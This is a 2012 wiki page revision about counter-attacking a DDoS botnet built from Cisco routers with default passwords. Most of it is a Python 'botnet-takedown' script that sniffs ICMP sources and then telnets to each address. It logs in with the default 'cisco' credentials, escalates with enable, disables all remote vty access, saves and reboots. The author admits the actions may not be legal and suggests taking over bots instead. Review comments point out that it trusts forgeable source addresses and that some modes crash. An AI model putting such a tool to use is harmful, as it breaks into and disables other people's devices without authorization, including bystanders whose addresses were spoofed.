Difference between revisions of "DDoS Attacks/takedowns/Krashed"
(Created page with "====Subject Identification==== * First encounter: 2600net, fail DDoS'd home router. * Aliases: Krashed, [Krashed]. Upon joining my IRC network, Krashed DDoS'd it with his fail C...") |
Line 3: | Line 3: | ||
* Aliases: Krashed, [Krashed]. | * Aliases: Krashed, [Krashed]. | ||
− | Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. | + | Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact. |
{{code|text=<source lang="python"> | {{code|text=<source lang="python"> |
Revision as of 18:37, 16 July 2012
Subject Identification
- First encounter: 2600net, fail DDoS'd home router.
- Aliases: Krashed, [Krashed].
Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact.
#!/usr/bin/python
# botnet-takedown.py
# (C) 2012 rorschach
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 1, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# ----------------------------------------------------------------------
#
# Cisco botnet takedown script.
# Written by rorschach
# Use at your own risk, the actions taken by this app may not be legal.
#
# Run in daemon mode (-d) it will listen for ICMP packets, when it sees one
# it will attempt to attack the IP.
#
# In tcpdump parse mode (-t) it will parse a tcpdump log for offending
# IP addresses.
#
# In IP list mode (-i) it simply takes in a list of IP addresses to attack.
#
# This script will login to open Cisco routers, turn off telnet and
# then reboot it. The functionality could be modified to do things
# like take over the bot so only you can use it, turn the attack on
# the attacker, etc. The sky is really the limit here. Modify the
# takedown() function for this.
#
# Dependencies: python 2.x and scapy
# To install on Ubuntu:
#
# sudo apt-get install python-scapy
#
# This script must be run as root if using daemon mode, due to the fact
# that it sniffs packets using scapy.
#
# Enjoy the script.
#
# Review notes (what the code below does, as read from it):
#  * Every address that reaches takedown() is handled identically: log in
#    with the vendor-default password, remove all inbound vty transports,
#    save the configuration and reload. Nothing verifies that the address
#    actually took part in an attack; in -d mode it is whatever source
#    address scapy's summary shows for an ICMP echo-request, which is
#    unauthenticated and forgeable.
#  * All error handling is a bare `except:`. A device that merely times
#    out, shows a different prompt, or rejects the password yields the
#    same one-line "Error" message as any other failure.
#  * The entry points and the dispatch in main() do not agree on argument
#    counts; see the NOTE(review) comments in main().

import sys, telnetlib, re, os, time, socket, threading
from threading import Thread  # unused below; the code uses threading.Thread
from scapy.all import *  # third-party; supplies sniff() used by takedownDaemon()


def usage(argZero):
    # Print the command-line synopsis and stop with exit status 1.
    # argZero: program name to display (main() passes sys.argv[0]).
    # Uses the site-module exit() rather than sys.exit(); the former is
    # absent when the interpreter runs with -S.
    print "Usage: " + argZero
    print " * -d -- Daemon mode, parse IPs live from incoming ICMP packets."
    print " * -t <tcpdump log> -- Parse IPs from tcpdump log."
    print " * -i <ip list> -- Load IPs from list."
    exit(1)


def takedown(ip):
    # Disable router using telnet.
    #
    # ip: host to connect to on TCP/23. It is passed to Telnet() as given;
    #     the rstrip() calls below only affect the printed lines.
    #
    # What the device ends up with if every prompt matches: the login and
    # enable passwords "cisco" accepted, `transport input none` applied to
    # vty 0-4 (no inbound vty sessions of any kind, not only telnet), the
    # modified configuration saved ("yes" at the Save? prompt) and the box
    # reloaded. That is a persistent loss of remote management until
    # someone with console access reverts it.
    #
    # Each read_until() waits at most 2 s and its return value is never
    # inspected, so the writes go out in this fixed order whether or not
    # the expected prompt appeared. Any exception -- connection refused,
    # timeout, unexpected output -- lands in the bare except and is
    # reported as a single "Error" line with no detail.
    print " [*] Disabling " + ip.rstrip()
    try:
        tn = telnetlib.Telnet(ip,23,2)  # 2 s connect timeout
        tn.read_until("Password:", timeout=2)
        # modify these commands to change functionality
        tn.write("cisco\n")  # login password (vendor default)
        tn.read_until(">", timeout=2)
        tn.write("enable\n")
        tn.read_until("Password:", timeout=2)
        tn.write("cisco\n")  # enable password (same default)
        tn.read_until("#", timeout=2)
        tn.write("config\n")
        tn.read_until("Configuring from terminal, memory, or network [terminal]?", timeout=2)
        tn.write("\n")  # accept the [terminal] default
        tn.read_until("(config)#", timeout=2)
        tn.write("line vty 0 4\n")
        tn.read_until("(config-line)#", timeout=2)
        tn.write("transport input none\n")  # no inbound vty transport at all
        tn.read_until("(config-line)#", timeout=2)
        tn.write("^Z\n")
        tn.read_until("#", timeout=2)
        tn.write("reload\n")
        tn.read_until("System configuration has been modified. Save? [yes/no]:", timeout=2)
        tn.write("yes\n")  # persists the vty change across the reload
        tn.read_until("Proceed with reload? [confirm]", timeout=2)
        tn.write("\n")
        tn.close()
    except:
        # Bare except: every failure mode collapses into this one line.
        print " [*] Error: " + ip.rstrip()


def takedownParse(pkt,ips):
    # Parse packets, check to make sure it is an ICMP echo-request, then make sure it has never been seen before, at that point run takedown()
    #
    # pkt: a scapy packet, delivered by sniff() from takedownDaemon().
    # ips: shared seen-list; entries read from the log keep their line
    #      endings, which is why both sides are rstrip()ed when comparing.
    #
    # The match is positional on the text of pkt.summary(): field 2 must be
    # "ICMP", field 6 "echo-request", and field 3 is taken as the source
    # address. No protocol fields are read directly, so this depends on
    # scapy's summary format. The source address is trusted as-is --
    # ICMP carries no sender authentication and the address is forgeable --
    # and is acted on without any further verification.
    if(pkt.summary().split()[2] == "ICMP" and pkt.summary().split()[6] == "echo-request"):
        ip = pkt.summary().split()[3]
        check = 0
        # Linear scan of the seen-list; grows with every new address.
        for eip in ips:
            if ip.rstrip() == eip.rstrip():
                check = 1
                break
        if check == 0:
            ips.append(ip)
            # Append the address (CRLF-terminated) to the persistent log.
            f = open("/root/takedown.log", "a+")
            f.write(ip + "\r\n")
            f.close()
            # Fire-and-forget: one thread per new address, never joined.
            t = threading.Thread(target=takedown,args=(ip,))
            t.start()


def loadIPs(file):
    # load IP list from file
    #
    # file: path to a text file with one address per line. (The parameter
    #       name shadows the Python 2 builtin `file` inside this function.)
    # Each line is stripped of its trailing whitespace and handed to
    # takedown() sequentially -- no threads here, unlike takedownParse().
    # Blank lines are not filtered; they reach takedown() as "".
    f = open(file, "r")
    ips = f.readlines()
    f.close()
    for ip in ips:
        takedown(ip.rstrip())


def parseDumpLogs(host, logFile):
    # parse tcpdump logs
    #
    # host:    never used in the body.
    # logFile: path to a tcpdump text log. Each line is split on whitespace;
    #          it is kept only when field 5 is exactly "icmp", in which
    #          case field 2 is taken as the source. Any other line --
    #          including one too short to index -- becomes "null".
    #          NOTE(review): assumes a particular tcpdump output format
    #          (field positions and lower-case "icmp"); confirm against the
    #          flags used to produce the log.
    # Returns nothing; prints progress and a summary line.
    currentTime = time.time()
    num = 0
    print " [*] Initiating takedown"
    print " [*] Reading tcpdump file"
    f = open(logFile, "r")  # never closed in this function
    # open log, filter out non-icmp packets
    ips = f.readlines()
    for n,ip in enumerate(ips):
        try:
            if ip.split()[5] == "icmp":
                ips[n] = ip.split()[2].rstrip()
            else:
                ips[n] = "null"
        except:
            pass  # short/malformed line: left as the raw line text
    ips = list(set(ips)) # remove duplicates (order is not preserved)
    print " [*] Resolving hostnames to IP addresses"
    for n,ip in enumerate(ips):
        # if there is a letter in the IP, resolve it to an IP address
        # (the local hostname and the "null" marker are skipped). A failed
        # lookup leaves the name in place, so it still reaches takedown().
        if(re.search("[a-zA-Z]",ip) != None and ip != socket.gethostname() and ip != "null"):
            try:
                tempIP = socket.gethostbyname(ip)
                if(tempIP != None):
                    ips[n] = tempIP.rstrip()
            except:
                pass
    for n,ip in enumerate(ips):
        # remove extraneous data: anything containing ':' (e.g. IPv6 or
        # host:port text) is dropped by marking it "null"; everything else
        # that survives the filter is counted in num.
        if(ip != socket.gethostname() and ip != "null" and ip != ""):
            if(ip.find(":") != -1):
                ips[n] = "null"
            else:
                num += 1
    print " [*] Taking down " + str(num) + " zombies"
    for ip in ips:
        # takedown each IP address (sequentially; num counts attempts, not
        # successes)
        if(ip != socket.gethostname() and ip != "null" and ip != ""):
            takedown(ip)
    # NOTE(review): `time.time() / currentTime` divides the two timestamps,
    # so the printed "seconds" figure is a ratio near 1, not elapsed time.
    print " [*] Takedown complete\r\n\r\nTook down " + str(num) + " IPs in " + str(time.time() / currentTime) + " seconds."


def takedownDaemon():
    # start sniffing and read IP log
    #
    # Reads /root/takedown.log (opened read-only, so a missing file raises
    # IOError before anything is sniffed), prints the addresses already
    # recorded, then forks twice and runs scapy's sniff() in the grandchild;
    # the original process and the first child simply return. sniff() is
    # given no filter, so every captured packet reaches takedownParse();
    # store=0 keeps scapy from retaining packets. The `ips` list (line
    # endings intact) is the seen-list shared with takedownParse().
    # NOTE(review): there is no setsid/chdir/fd redirection here -- a
    # double fork only, so presumably the sniffer keeps the terminal.
    f = open("/root/takedown.log", "r")
    ips = f.readlines()
    f.close()
    print "\r\n -- IPs previously taken down -- \r\n"
    for ip in ips:
        print " [*] " + ip.rstrip()
    print "\r\n ------------------------------- \r\n"
    if os.fork() == 0:
        if os.fork() == 0:
            sniff(prn=lambda pkt:takedownParse(pkt,ips), store=0)


def main():
    # Dispatch on sys.argv[1]: -d daemon mode, -t tcpdump log, -i address
    # list; anything else (or no argument) prints usage and exits.
    # NOTE(review): the -d branch passes sys.argv[2] (not checked to exist)
    # to takedownDaemon(), which declares no parameters, and the -t branch
    # passes one argument to parseDumpLogs(), which declares two. As
    # written, both branches raise TypeError at the call.
    print "botnet-takedown.py"
    if(len(sys.argv) < 2):
        usage(sys.argv[0])
    if(sys.argv[1] == "-d"):
        # daemon mode
        takedownDaemon(sys.argv[2])
    elif(sys.argv[1] == "-t"):
        # tcpdump logs
        if(len(sys.argv) == 3):
            parseDumpLogs(sys.argv[2])
        else:
            usage(sys.argv[0])
    elif(sys.argv[1] == "-i"):
        # ip log mode
        if(len(sys.argv) == 3):
            loadIPs(sys.argv[2])
        else:
            usage(sys.argv[0])
    else:
        usage(sys.argv[0])


if __name__ == "__main__":
    main()